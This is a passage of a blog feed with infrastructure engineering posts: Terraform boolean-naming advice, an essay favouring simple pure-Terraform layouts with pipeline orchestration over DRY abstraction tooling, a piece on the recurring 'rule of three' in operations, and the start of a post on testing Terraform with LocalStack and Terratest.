<p>Boolean variables with negative names add unnecessary mental overhead. Positive variable names make conditional logic clearer and reduce the chance of configuration mistakes.</p>

<h3 id="the-problem-1">The Problem</h3>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># ❌ Negative variable name</span>
<span class="nx">variable</span> <span class="s2">"disable_encryption"</span> <span class="p">{</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Disable encryption"</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">bool</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="kc">false</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_s3_bucket_server_side_encryption_configuration"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">count</span>  <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">disable_encryption</span> <span class="o">?</span> <span class="mi">0</span> <span class="o">:</span> <span class="mi">1</span>
  <span class="nx">bucket</span> <span class="o">=</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">id</span>
  <span class="c1"># ...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">count</code> line requires mental translation: “If <code class="language-plaintext highlighter-rouge">disable_encryption</code> is <code class="language-plaintext highlighter-rouge">false</code>, then <code class="language-plaintext highlighter-rouge">count</code> is <code class="language-plaintext highlighter-rouge">1</code>, so encryption is enabled.” That’s a double negative in what should be straightforward logic.</p>

<p>This pattern creates real problems during code review. A change from <code class="language-plaintext highlighter-rouge">default = false</code> to <code class="language-plaintext highlighter-rouge">default = true</code> looks like it’s “enabling” something when it’s actually doing the opposite.</p>

<h3 id="the-solution-1">The Solution</h3>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># ✅ Positive variable name</span>
<span class="nx">variable</span> <span class="s2">"encryption_enabled"</span> <span class="p">{</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Enable encryption"</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">bool</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="kc">true</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_s3_bucket_server_side_encryption_configuration"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">count</span>  <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">encryption_enabled</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span>
  <span class="nx">bucket</span> <span class="o">=</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">id</span>
  <span class="c1"># ...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The logic now reads directly: “If <code class="language-plaintext highlighter-rouge">encryption_enabled</code> is <code class="language-plaintext highlighter-rouge">true</code>, create the encryption config.”</p>

<p>Positive naming also makes security choices more explicit. Setting <code class="language-plaintext highlighter-rouge">encryption_enabled = false</code> is visually clearer than <code class="language-plaintext highlighter-rouge">disable_encryption = true</code>, even though they’re functionally equivalent.</p>

<p><strong>Name variables for what they enable, not what they prevent.</strong></p>
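
<p>Sometimes the provider itself exposes a negative argument, such as <code class="language-plaintext highlighter-rouge">skip_final_snapshot</code> on <code class="language-plaintext highlighter-rouge">aws_db_instance</code>. One way to handle that, sketched here with a hypothetical variable name, is to keep the module interface positive and invert the value once, where it meets the provider:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Hypothetical module variable with a positive name
variable "final_snapshot_enabled" {
  description = "Take a final snapshot when the database is destroyed"
  type        = bool
  default     = true
}

resource "aws_db_instance" "this" {
  # The provider argument is negative, so invert once at the boundary
  skip_final_snapshot = !var.final_snapshot_enabled
  # ...
}
</code></pre></div></div>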

<hr />

<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="terraform" /><category term="iac" /><category term="infrastructure" /><category term="best-practices" /><category term="devops" /><summary type="html"><![CDATA[After a few years of writing open-source Terraform modules, I’ve picked up a few syntax tricks that make code safer, cleaner, and easier to maintain. These aren’t revolutionary, but they’re simple patterns that prevent common mistakes and make the infrastructure more resilient. Based on the configurations I’ve seen in the wild, these techniques seem to be underutilized.]]></summary></entry><entry><title type="html">KISS vs DRY in Infrastructure as Code: Why Simple Often Beats Clever</title><link href="https://rosesecurity.cloud/2025/11/14/kiss-versus-dry-iac.html" rel="alternate" type="text/html" title="KISS vs DRY in Infrastructure as Code: Why Simple Often Beats Clever" /><published>2025-11-14T00:00:00+00:00</published><updated>2025-11-14T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/11/14/kiss-versus-dry-iac</id><content type="html" xml:base="https://rosesecurity.cloud/2025/11/14/kiss-versus-dry-iac.html"><![CDATA[<h2 id="the-scale-gap-problem">The Scale Gap Problem</h2>

<p>Every Infrastructure as Code tutorial starts the same way: provision a single S3 bucket, create one EC2 instance, deploy a basic load balancer. The examples are clean, simple, and elegant. You follow along, everything works, and you feel like you understand Terraform.</p>

<p>Then you get to your actual production environment, and everything changes.</p>

<p>You’re not starting from scratch with a blank AWS account. You’ve got existing resources that were manually created two years ago by someone who left the company. There’s brownfield infrastructure everywhere with no clear documentation. You need to import existing state, figure out what’s actually running, and somehow wrangle it all into code without breaking production. On top of that, you need to manage 200 instances across dev, staging, and production environments. Multiple AWS accounts with different configurations and permissions. Three regions for disaster recovery. Azure for the legacy workloads that nobody wants to touch. GCP running your GKE clusters for the containerized applications.</p>

<p>Suddenly that elegant tutorial code becomes a nightmare of orchestration, state management, environment-specific configurations, and brownfield complexity. You’re not just writing infrastructure code anymore. You’re trying to organize, orchestrate, and maintain it at scale while dealing with the reality that infrastructure is messy, evolving, and full of historical baggage.</p>

<p>This is the scale gap, and it’s where the KISS vs DRY debate stops being theoretical and starts costing real time, money, and engineering effort.</p>

<h2 id="the-dry-revolution-solving-yesterdays-problems">The DRY Revolution: Solving Yesterday’s Problems</h2>

<p>When teams hit the scale gap, the instinct is to eliminate repetition. DRY (Don’t Repeat Yourself) is gospel in software engineering, so infrastructure engineers did what they do best and built tools to solve the problem.</p>

<p>Terragrunt emerged to manage backend configurations and reduce repetition across environments. Terraspace and other abstraction frameworks followed, promising sophisticated hierarchical inheritance models and dynamic configuration generation. Module libraries grew into complex ecosystems. Teams adopted these patterns because they represented “best practices,” not necessarily because they had the specific problems these tools were designed to solve.</p>

<p>The promise was compelling: write your infrastructure once, reuse it everywhere, maintain it in one place, and scale effortlessly.</p>

<p>Terraform itself evolved to address these needs as well, adding workspaces, dynamic blocks, <code class="language-plaintext highlighter-rouge">for_each</code>, improved module capabilities, and other features designed to support DRY principles natively.</p>

<p>On paper, it all made perfect sense. In practice, the cost turned out to be higher than anyone expected.</p>

<h2 id="the-hidden-costs-of-going-dry">The Hidden Costs of Going DRY</h2>

<h3 id="when-abstractions-break-troubleshooting-becomes-archaeological">When Abstractions Break, Troubleshooting Becomes Archaeological</h3>

<p>It’s 3 AM and production is down. You need to understand why Terraform is trying to destroy and recreate your database, and you need to understand it right now.</p>

<p>With a DRY setup using Terragrunt and hierarchical inheritance, you’re not just reading Terraform code. You’re tracing values through multiple layers: the root <code class="language-plaintext highlighter-rouge">terragrunt.hcl</code> with base configurations, environment-specific overrides in nested directories, dynamically generated backend configurations, module abstractions that call other modules, and variables cascading through inheritance chains.</p>

<p>Where did that database configuration value actually come from? The global config? The environment override? A module default? You’re playing detective instead of fixing the problem. Each abstraction layer adds cognitive overhead when you can least afford it, which is during high-pressure incidents at 3 AM.</p>

<p>The fundamental issue is that DRY tooling optimizes for writing code, not reading it under pressure.</p>

<h3 id="the-onboarding-cliff">The Onboarding Cliff</h3>

<p>It’s a new team member’s first day and they need to update a security group rule in the staging environment. Simple enough, right?</p>

<p>With DRY abstraction tooling, they need to learn Terraform itself, your module library’s conventions and abstractions, Terragrunt (or Terraspace, or your custom wrapper), your hierarchical configuration structure, how values inherit and override across layers, and where to make changes without breaking other environments.</p>

<p>That’s not onboarding, that’s an apprenticeship. What should take an hour takes days. What should be a simple change becomes a guided tour through your infrastructure philosophy.</p>

<p>Compare this to opening a directory, seeing exactly what gets deployed to staging, making the change, and submitting a PR. The difference in time-to-productivity is measured in weeks.</p>

<h3 id="ecosystem-lock-in-the-hidden-technical-debt">Ecosystem Lock-in: The Hidden Technical Debt</h3>

<p>Once you’ve invested in a DRY abstraction framework, you’re locked in. Your entire codebase assumes its patterns. Your team has learned its idioms. Your CI/CD pipelines depend on it. Your documentation references it.</p>

<p>Migrating away becomes a massive project that no one wants to fund. Meanwhile, the tool’s limitations become your limitations. When Terraform adds new features, you wait for your abstraction layer to support them—if it ever does.</p>

<p>You’ve traded lines of code for organizational flexibility.</p>

<h2 id="the-kiss-alternative-orchestration-in-pipelines-simplicity-in-code">The KISS Alternative: Orchestration in Pipelines, Simplicity in Code</h2>

<p>After years of working with various Terraform patterns, from sophisticated DRY frameworks to custom abstraction layers, I found a pattern that just works: <strong>pure Terraform with GitHub Actions orchestration</strong>.</p>

<p>This isn’t about rejecting tools like Terragrunt or Terraspace entirely. They have their place at specific scales and contexts. But for the majority of teams managing infrastructure at moderate scale, there’s a simpler path that works better.</p>

<h3 id="the-core-insight-complexity-can-only-be-relocated">The Core Insight: Complexity Can Only Be Relocated</h3>

<p>Orchestration complexity across environments cannot be eliminated. You can’t wish away the fact that dev, staging, and production need different configurations, or that multi-region deployments require coordination.</p>

<p>The question isn’t “how do we eliminate complexity?” It’s “where do we put the complexity to minimize time to business value?”</p>

<p><strong>DRY approach</strong>: Complexity lives in abstraction tooling and configuration hierarchies<br />
<strong>KISS approach</strong>: Complexity lives in CI/CD pipelines, where it’s observable and debuggable</p>

<h3 id="the-repo-structure-nested-and-navigable">The Repo Structure: Nested and Navigable</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>├── aws/
│   ├── us-east-1/
│   │   ├── dev/
│   │   │   ├── vpc/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── eks/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── mwaa/
│   │   │   │   └── [terraform files]
│   │   │   ├── opensearch/
│   │   │   │   └── [terraform files]
│   │   │   └── rds/
│   │   │       └── [terraform files]
│   │   ├── staging/
│   │   │   ├── vpc/
│   │   │   ├── eks/
│   │   │   ├── mwaa/
│   │   │   └── [other services]
│   │   └── prod/
│   │       ├── vpc/
│   │       ├── eks/
│   │       ├── mwaa/
│   │       └── [other services]
│   └── us-west-2/
│       └── [similar structure]
├── azure/
│   └── [similar structure]
├── gcp/
│   └── [similar structure]
└── modules/
    ├── networking/
    ├── compute/
    ├── kubernetes/
    └── databases/
</code></pre></div></div>

<p><strong>Key characteristics:</strong></p>
<ul>
  <li>Can break down by service (eks, mwaa, opensearch) or by logical grouping depending on your needs</li>
  <li>Each service has its own state file and an isolated blast radius</li>
  <li>Reusable modules live in a central directory</li>
  <li>No terraliths, no monolithic state files</li>
  <li>Completely navigable: you can grep for anything</li>
</ul>

<p>Each service directory is a complete Terraform root module. Open <code class="language-plaintext highlighter-rouge">aws/us-east-1/prod/eks/</code> and you see exactly what’s deployed for your production EKS cluster in us-east-1. No inheritance chains. No dynamic generation. No magic. Just the actual configuration that gets applied.</p>
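
<p>As a rough sketch of what such a root module might contain (the module inputs below are hypothetical, not taken from a real repository), <code class="language-plaintext highlighter-rouge">aws/us-east-1/prod/eks/main.tf</code> could be little more than a call into the shared <code class="language-plaintext highlighter-rouge">modules/kubernetes</code> directory, with values supplied by the neighboring <code class="language-plaintext highlighter-rouge">terraform.tfvars</code>:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># aws/us-east-1/prod/eks/main.tf (illustrative; module inputs are hypothetical)</span>
<span class="nx">module</span> <span class="s2">"eks"</span> <span class="p">{</span>
  <span class="c1"># Relative path from this root module up to the shared modules directory</span>
  <span class="nx">source</span> <span class="o">=</span> <span class="s2">"../../../../modules/kubernetes"</span>

  <span class="nx">cluster_name</span>       <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">cluster_name</span>
  <span class="nx">kubernetes_version</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">kubernetes_version</span>
  <span class="nx">subnet_ids</span>         <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">subnet_ids</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Because the <code class="language-plaintext highlighter-rouge">source</code> path is a plain string, finding every consumer of a module is also just a grep away.</p>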

<h3 id="yes-backend-configs-repeat-and-thats-actually-a-feature">Yes, Backend Configs Repeat (And That’s Actually a Feature)</h3>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># aws/core-infrastructure/prod/backend.tf</span>
<span class="nx">terraform</span> <span class="p">{</span>
  <span class="nx">backend</span> <span class="s2">"s3"</span> <span class="p">{</span>
    <span class="nx">bucket</span>         <span class="o">=</span> <span class="s2">"myorg-terraform-state-prod"</span>
    <span class="nx">key</span>            <span class="o">=</span> <span class="s2">"core-infrastructure/terraform.tfstate"</span>
    <span class="nx">region</span>         <span class="o">=</span> <span class="s2">"us-east-1"</span>
    <span class="nx">encrypt</span>        <span class="o">=</span> <span class="kc">true</span>
    <span class="nx">dynamodb_table</span> <span class="o">=</span> <span class="s2">"terraform-state-lock-prod"</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This config appears in every environment directory with slight variations. DRY purists hate this, but I love it.</p>

<p>When something goes wrong with state, I can immediately see which bucket holds this state and which DynamoDB table provides locking, and I don’t need to trace through dynamic generation logic. Running <code class="language-plaintext highlighter-rouge">grep -r "myorg-terraform-state-prod" .</code> from the repo root shows me every environment using that bucket instantly.</p>

<p>The cost of repetition is about 100 lines of simple HCL across 20 environments. The benefit is instant troubleshooting, zero cognitive overhead, and perfect clarity about where everything lives.</p>
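
<p>For illustration, the dev counterpart of the backend above might differ only in its bucket and lock table. The names below are assumed by analogy with the prod example rather than taken from a real setup:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Hypothetical dev counterpart; bucket and table names are assumed by analogy with prod</span>
<span class="nx">terraform</span> <span class="p">{</span>
  <span class="nx">backend</span> <span class="s2">"s3"</span> <span class="p">{</span>
    <span class="nx">bucket</span>         <span class="o">=</span> <span class="s2">"myorg-terraform-state-dev"</span>
    <span class="nx">key</span>            <span class="o">=</span> <span class="s2">"core-infrastructure/terraform.tfstate"</span>
    <span class="nx">region</span>         <span class="o">=</span> <span class="s2">"us-east-1"</span>
    <span class="nx">encrypt</span>        <span class="o">=</span> <span class="kc">true</span>
    <span class="nx">dynamodb_table</span> <span class="o">=</span> <span class="s2">"terraform-state-lock-dev"</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Two strings change between environments, and both are visible in a plain diff of the two files.</p>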

<h3 id="orchestration-lives-in-pipelines">Orchestration Lives in Pipelines</h3>

<p>This is where the magic happens, and where the orchestration complexity actually belongs.</p>

<p>Home-grown GitHub Actions provide:</p>

<p><strong>For Pull Requests:</strong></p>
<ul>
  <li>Auto-detect which environments changed based on file paths</li>
  <li>Run <code class="language-plaintext highlighter-rouge">terraform plan</code> for affected environments</li>
  <li>Post plan output as PR comment</li>
  <li>Run security/compliance checks</li>
  <li>Block merge on plan failures</li>
</ul>

<p><strong>For Main Branch:</strong></p>
<ul>
  <li>Auto-detect environments to apply</li>
  <li>Run <code class="language-plaintext highlighter-rouge">terraform apply</code> with approval gates</li>
  <li>Alert on failed applies</li>
  <li>Remediate orphaned resources</li>
  <li>Track drift and create tickets</li>
</ul>

<p><strong>Scheduled:</strong></p>
<ul>
  <li>Nightly drift detection across all environments</li>
  <li>Compare live state to code</li>
  <li>Alert on unexpected changes</li>
</ul>

<p>The result is minimal troubleshooting, teams freed to focus on business value, and infrastructure that’s invisible (which is exactly as it should be).</p>

<h2 id="addressing-the-objections">Addressing the Objections</h2>

<h3 id="but-youre-repeating-backend-configurations">“But You’re Repeating Backend Configurations!”</h3>

<p>Yes. Intentionally.</p>

<p>100 lines of repeated backend config across environments vs. 40 hours learning Terragrunt’s nuances. Which has a better ROI?</p>

<p>Repetition creates greppability. When investigating state issues, <code class="language-plaintext highlighter-rouge">grep -r "bucket-name" .</code> immediately shows every environment. No tracing through dynamic generation. No “where did this value come from?”</p>

<p>In infrastructure code, transparency trumps terseness every time.</p>

<h3 id="you-dont-have-hierarchical-inheritance">“You Don’t Have Hierarchical Inheritance!”</h3>

<p>Correct, and that’s also intentional.</p>

<p>Hierarchical inheritance creates implicit dependencies. Values cascade from global to regional to environment-specific configs. When something breaks, you’re debugging the inheritance chain instead of the infrastructure.</p>

<p>Without inheritance, every value is explicit in the environment directory. New team members don’t need to learn your inheritance model; they just read the config.</p>

<p>The onboarding time saved pays for repeated config 100 times over.</p>
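
<p>To make “explicit” concrete, a production VPC’s <code class="language-plaintext highlighter-rouge">terraform.tfvars</code> might look something like the sketch below. The variable names and values are assumptions for illustration; the point is only that nothing is inherited from a parent file:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># aws/us-east-1/prod/vpc/terraform.tfvars (illustrative values, hypothetical variable names)</span>
<span class="nx">vpc_cidr</span>           <span class="o">=</span> <span class="s2">"10.20.0.0/16"</span>
<span class="nx">availability_zones</span> <span class="o">=</span> <span class="p">[</span><span class="s2">"us-east-1a"</span><span class="p">,</span> <span class="s2">"us-east-1b"</span><span class="p">,</span> <span class="s2">"us-east-1c"</span><span class="p">]</span>
<span class="nx">enable_nat_gateway</span> <span class="o">=</span> <span class="kc">true</span>
</code></pre></div></div>

<p>Every value that reaches <code class="language-plaintext highlighter-rouge">terraform apply</code> for this directory is in this file or in the <code class="language-plaintext highlighter-rouge">.tf</code> files next to it.</p>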

<h3 id="this-wont-scale">“This Won’t Scale!”</h3>

<p>It depends on what you mean by “scale.”</p>

<p>200 environments across multiple accounts and regions? This pattern handles it cleanly. Each environment is independent, changes are isolated, and blast radius is contained.</p>

<p>The pattern breaks down at truly massive scale, like 1000+ environments with complex interdependencies. At that point, you need more sophisticated tooling. But be honest: do you actually have that problem, or are you solving for imagined future scale?</p>

<p>Most teams adopt DRY tooling as “best practice” before hitting the scale where it provides value. They pay the complexity cost without reaping the benefits.</p>

<h2 id="when-to-use-what-the-nuanced-reality">When to Use What: The Nuanced Reality</h2>

<h3 id="kiss-makes-sense-when">KISS Makes Sense When:</h3>
<ul>
  <li>You have fewer than 500 environments</li>
  <li>Team size is small to medium (&lt; 50 engineers)</li>
  <li>Change frequency is low (infrastructure mostly stable after initial deployment)</li>
  <li>Operational clarity is critical (regulated industries, high-stakes infrastructure)</li>
  <li>Team has varied experience levels (sysadmins, not primarily developers)</li>
  <li>Troubleshooting speed matters more than code elegance</li>
</ul>

<h3 id="dry-tooling-makes-sense-when">DRY Tooling Makes Sense When:</h3>
<ul>
  <li>You genuinely have massive scale (1000+ environments with interdependencies)</li>
  <li>Your team is primarily platform engineers comfortable with abstraction</li>
  <li>You have a dedicated platform team maintaining the tooling</li>
  <li>Environment configurations have complex shared logic that changes frequently</li>
  <li>You’re building infrastructure-as-a-product with many consumers</li>
  <li>Compliance requires enforced patterns across all deployments</li>
</ul>

<h3 id="the-real-question-whats-your-actual-cost-metric">The Real Question: What’s Your Actual Cost Metric?</h3>

<p><strong>If your cost metric is lines of code written</strong>, choose DRY.<br />
<strong>If your cost metric is time to accomplish business goals</strong>, choose KISS.</p>

<p>Everything that increases time to business value (technical debt from abstraction, lengthy onboarding, opaque troubleshooting) is expensive regardless of how “clean” the code looks.</p>

<h2 id="the-anti-pattern-engineering-for-engineerings-sake">The Anti-Pattern: Engineering for Engineering’s Sake</h2>

<p>The most dangerous trap in infrastructure work is falling in love with the tool or solution rather than the problem.</p>

<p>When teams spend months building sophisticated hierarchies with dynamic generation and complex inheritance models, they’re often solving for code aesthetics, not business needs. The infrastructure becomes the focus instead of what it enables.</p>

<p>Good infrastructure engineering is invisible. It lets other teams ship quickly without thinking about the underlying platforms. It doesn’t require specialized knowledge to make basic changes. It doesn’t become a bottleneck or a point of pride; it’s just there, working, quietly enabling the business.</p>

<p>This requires humility. The “clever” solution that demonstrates engineering prowess is often the wrong solution for the business. The “boring” solution that anyone can understand and modify is often right.</p>

<h2 id="the-minimum-viable-architecture-principle">The Minimum Viable Architecture Principle</h2>

<p>Start with what you need now. Build it simply. Make it modular so pieces can be replaced. Iterate and improve over time as actual needs emerge.</p>

<p>Don’t build for imagined future scale that may never materialize. Don’t adopt sophisticated tooling because it’s “best practice” if you don’t have the problems it solves. Don’t engineer abstractions that save lines of code but cost weeks of onboarding time.</p>

<p><strong>Infrastructure is an auxiliary operation.</strong> Its job is to get out of the way and let the business move fast. Every layer of abstraction, every sophisticated pattern, every clever optimization should be justified by actual business impact—not engineering aesthetics.</p>

<h2 id="conclusion-choose-boring-technology">Conclusion: Choose Boring Technology</h2>

<p>After years of working with Infrastructure as Code at various scales, here’s what I’ve learned:</p>

<p>Orchestration complexity can’t be eliminated; it can only be relocated. The question is where to put it. For most teams, putting that complexity in observable, debuggable CI/CD pipelines beats putting it in abstraction frameworks and configuration hierarchies.</p>

<p>Terraform itself is powerful enough for most use cases. Most teams don’t need additional abstraction layers. Pure Terraform with thoughtful repo structure and pipeline orchestration handles moderate scale beautifully while keeping troubleshooting straightforward and onboarding fast.</p>

<p>There’s a place for sophisticated DRY tooling at massive scale with dedicated platform teams. But most teams aren’t there yet. They’re paying complexity costs for benefits they haven’t yet earned.</p>

<p>Choose boring technology. Keep it simple. Focus on business velocity over code elegance. Your 3 AM self will thank you.</p>

<hr />

<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="terraform" /><category term="culture" /><category term="technicaldebt" /><category term="quality" /><category term="code" /><summary type="html"><![CDATA[The Scale Gap Problem]]></summary></entry><entry><title type="html">Gang of Three: Pragmatic Operations Design Patterns</title><link href="https://rosesecurity.cloud/2025/10/23/gang-of-three.html" rel="alternate" type="text/html" title="Gang of Three: Pragmatic Operations Design Patterns" /><published>2025-10-23T00:00:00+00:00</published><updated>2025-10-23T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/10/23/gang-of-three</id><content type="html" xml:base="https://rosesecurity.cloud/2025/10/23/gang-of-three.html"><![CDATA[<p>This blog is dedicated to <a href="https://github.com/arcaven">arcaven</a>, who initially made me aware of this observation and opened my eyes to the wild world of infrastructure and system operations patterns at scale.</p>

<h2 id="i-cant-unsee-it">I Can’t Unsee It</h2>

<p>A few weeks ago, something clicked. Maybe the shorter, winter-approaching days slowed me down enough to notice, but suddenly threes were everywhere. Why do we split environments into development, staging, and production? Why do we stage upgrades across three clusters? Why do we run hot, warm, and cold storage tiers? Why does our CI/CD pipeline have build and test, staging deployment, and production deployment gates?</p>

<p>The number three keeps showing up in systems work, and surprisingly few people talk about it explicitly. As it turns out, this pattern is not a coincidence. It represents the intersection of distributed systems theory and practical operations experience. Once you start looking for it, you’ll find the rule of three embedded in nearly every mature infrastructure decision.</p>

<h2 id="where-consensus-algorithms-meet-change-management">Where Consensus Algorithms Meet Change Management</h2>

<p>Distributed systems run on quorum-based decision making. What that means is that a majority of nodes have to agree before committing state changes (see Paxos and Raft). These consensus algorithms are designed to handle node failures, communication delays, and network partitions while ensuring the system can continue making progress even when failures occur. With three nodes, you can lose one and still have two nodes available to form a majority. This gives you fault tolerance and forward progress in the same architectural package.</p>

<p>Two nodes cannot lose anything without risking deadlock or split-brain scenarios. Reaching quorum requires more than half of the nodes, so three nodes tolerate one failure, four still tolerate only one, and five tolerate two. Larger odd-sized clusters provide more headroom for failures, but three is the minimum viable number that actually delivers reliable consensus. It is also practical from a cost and complexity perspective. This is why you see three-node clusters everywhere across the industry. This is not cargo culting or blind imitation; this is mathematics driving architecture.</p>

<p>The same logic drives traditional thinking around redundancy planning. Three instances means one for baseline capacity, one available during maintenance windows, and one ready for the surprise failure at 3am. Load balancers, database replicas, and availability zones all follow this pattern because it maps cleanly to how systems actually fail in production environments.</p>

<p>This pattern also extends to monitoring and alerting systems. Three data points allow you to establish a trend and distinguish between noise and signal. A single metric spike might be nothing, two consecutive spikes suggest investigation, but three consecutive anomalies typically trigger automated responses or pages. The threshold of three provides enough confidence to act without creating alert fatigue from false positives.</p>

<h2 id="aws-best-practices-and-chaos-engineering">AWS Best Practices and Chaos Engineering</h2>

<p>AWS regions typically ship with three or more availability zones, and the Well-Architected Framework encourages spreading workloads across them. This is not just resilience theater or checkbox compliance. It embodies that same quorum mathematics we discussed earlier. Lose one availability zone and your system continues running with consensus intact. Your application remains available, your data stays consistent, and your customers notice nothing.</p>

<p>Chaos engineering practices naturally gravitate toward threes as well. Kill one instance and observe what happens. You are testing real failure modes while keeping two healthy nodes as a safety net. This allows destructive testing that does not actually destroy your service. You gain confidence in your resilience mechanisms without risking a full outage. Tools like Chaos Monkey and Gremlin are built around this philosophy of controlled, incremental failure injection.</p>

<p>Rolling deployments across three clusters provide a built-in verification pattern that works remarkably well in practice. Deploy to the first cluster, verify correct behavior, then proceed to the second. Verify again, then move to the third. These two checkpoints before full rollout give you opportunities to catch unusual issues before they propagate everywhere. Your first cluster serves as your canary, detecting problems early. Your second cluster provides a confidence check that the issue was not environment-specific. Your third cluster represents your validated rollout to the remainder of your infrastructure.</p>

<h2 id="storage-hierarchies-and-performance-tiers">Storage Hierarchies and Performance Tiers</h2>

<p>Storage systems provide another compelling example of the rule of three in action. Hot storage serves frequently accessed data with low latency. Warm storage holds less frequently accessed data at moderate cost and performance. Cold storage archives rarely accessed data at minimal cost. This three-tier architecture balances performance requirements against budget constraints while providing clear migration paths as data ages.</p>

<p>Cloud providers have built entire product lines around this model. Amazon S3 offers Standard, Infrequent Access, and Glacier tiers. Azure provides Hot, Cool, and Archive tiers. Google Cloud offers Standard, Nearline, and Coldline storage classes. The consistency across providers suggests this is not arbitrary product segmentation but rather a natural reflection of how organizations actually use data over time.</p>

<p>Database systems follow similar patterns. Many databases implement a three-level caching strategy with L1 cache in memory, L2 cache on fast local storage, and L3 representing the authoritative data on persistent storage. Each level trades off speed for capacity and durability. This hierarchy allows databases to serve most queries from fast cache while maintaining data integrity through persistent storage.</p>

<h2 id="the-practical-value-of-three">The Practical Value of Three</h2>

<p>Understanding why three works so well helps us make better infrastructure decisions. When designing a new system, starting with three of anything gives you a resilient foundation without over-engineering. Three availability zones, three environment tiers, three deployment stages, three monitoring thresholds. Each application of the pattern provides fault tolerance, verification opportunities, and practical operability.</p>

<p>This does not mean three is always the right answer. Some systems genuinely need more redundancy or more granular staging. However, three serves as an excellent default that you should consciously decide to deviate from rather than accidentally under-provision. If you find yourself choosing two of something, ask whether you are accepting unnecessary fragility. If you are choosing five, ask whether the additional complexity provides proportional value. Thanks for reading, and if you like this blog, you might like the code and tools in <a href="https://github.com/R0seSecurity">my Github</a>.</p>]]></content><author><name></name></author><category term="operations" /><category term="infrastructure" /><category term="administration" /><summary type="html"><![CDATA[This blog is dedicated to arcaven, who initially made me aware of this observation and opened my eyes to the wild world of infrastructure and system operations patterns at scale.]]></summary></entry><entry><title type="html">Testing IaC with the TerraStack</title><link href="https://rosesecurity.cloud/2025/08/15/testing-iac-with-the-terrastack.html" rel="alternate" type="text/html" title="Testing IaC with the TerraStack" /><published>2025-08-15T00:00:00+00:00</published><updated>2025-08-15T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/08/15/testing-iac-with-the-terrastack</id><content type="html" xml:base="https://rosesecurity.cloud/2025/08/15/testing-iac-with-the-terrastack.html"><![CDATA[<h2 id="context">Context</h2>

<p>You write a Terraform module, parameterize the inputs, add some advanced settings, and push your PR. You’re 76% confident it works as intended. Most configuration looks solid, but a few settings could go either way when your <code class="language-plaintext highlighter-rouge">apply</code> pipeline runs. You’ve heard about test-driven development, seen <code class="language-plaintext highlighter-rouge">test</code> directories in popular open source Terraform modules with some obscure Go code, but you’re not sure how it all fits together. On top of that, you don’t have a dedicated test account for deploying test resources, and spinning up real AWS infrastructure just to test some simple configurations feels like overkill.</p>

<p>I’ve seen this scenario <em>a lot</em>, so I took a crack at a solution. Testing Infrastructure as Code has always been a bit of a pain point with limited options. The usual choices are crossing your fingers and hoping, manual testing in dev accounts, unit testing with mocks that miss actual cloud provider interactions, or expensive integration testing with real resources (that become orphaned and require <code class="language-plaintext highlighter-rouge">aws-nuke</code>… different story for another blog). What we really need is something that gives us confidence without the overhead, cost, or complexity of managing separate test infrastructure.</p>

<h2 id="building-the-terrastack">Building the TerraStack</h2>

<p>I built yet another Go package to eliminate some pains of testing Infrastructure as Code (IaC). When you don’t have a dedicated test account, can’t predict how your configurations will hold up when they actually hit the API, and want to have a consolidated way to test locally and in CI/CD pipelines, this helper library can help. The <a href="https://github.com/R0seSecurity/go-localstack">go-localstack</a> package combines the power of LocalStack (a fully functional local AWS cloud stack) with Terratest’s battle-tested testing framework. I jokingly call this duo the TerraStack (please don’t sue me, company that <em>builds geospatial products that enable smarter land asset management and development</em>).</p>

